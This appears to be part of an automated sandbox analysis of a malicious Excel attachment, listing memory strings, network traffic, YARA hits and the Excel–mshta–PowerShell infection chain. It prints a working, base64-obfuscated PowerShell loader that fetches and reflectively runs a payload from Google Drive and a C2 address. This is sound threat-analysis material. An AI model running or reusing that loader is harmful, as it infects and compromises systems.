      Source: mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htacepC:
      Source: mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htag
      Source: mshta.exe, 00000004.00000003.427607890.0000000002565000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470138759.0000000002285000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476638710.0000000002285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htahttp://192.210.2
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru
      Source: powershell.exe, 00000005.00000002.475447334.000000001C1F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
      Source: powershell.exe, 00000005.00000002.458032894.000000000350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: powershell.exe, 00000005.00000002.458032894.0000000002151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.517859410.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.488335048.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 0000000E.00000002.517859410.00000000024D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
      Source: powershell.exe, 0000001B.00000002.539375393.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6
      Source: powershell.exe, 0000001B.00000002.539375393.0000000002852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
      Source: powershell.exe, 0000000E.00000002.517859410.0000000002697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002A17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
      Source: powershell.exe, 0000000E.00000002.517859410.0000000002697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002A17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
      Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: mshta.exe, 00000004.00000003.426419047.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.428563336.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427286039.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://u4u.kids/
      Source: mshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://u4u.kids/K
      Source: mshta.exe, 0000000F.00000002.479317402.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BE0000.00000004.00000020.00020000.00000000.sdmp, A & C Metrology OC 5457144.xls, 54330000.0.drString found in binary or memory: https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&S
      Source: mshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://u4u.kids/b
      Source: mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://u4u.kids/nt
      Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
      Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49169 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49168 version: TLS 1.2
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: Process Memory Space: powershell.exe PID: 204, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Excel sheet contains many unusual embedded objects
      Source: A & C Metrology OC 5457144.xlsOLE: Microsoft Excel 2007+
      Source: A & C Metrology OC 5457144.xlsOLE: Microsoft Excel 2007+
      Source: A & C Metrology OC 5457144.xlsOLE: Microsoft Excel 2007+
      Source: 54330000.0.drOLE: Microsoft Excel 2007+
      Source: 54330000.0.drOLE: Microsoft Excel 2007+
      Source: 54330000.0.drOLE: Microsoft Excel 2007+
      Microsoft Office drops suspicious files
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uwantskillthingstobegreatthingswitheveryonewithuthat[1].htaJump to behavior
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
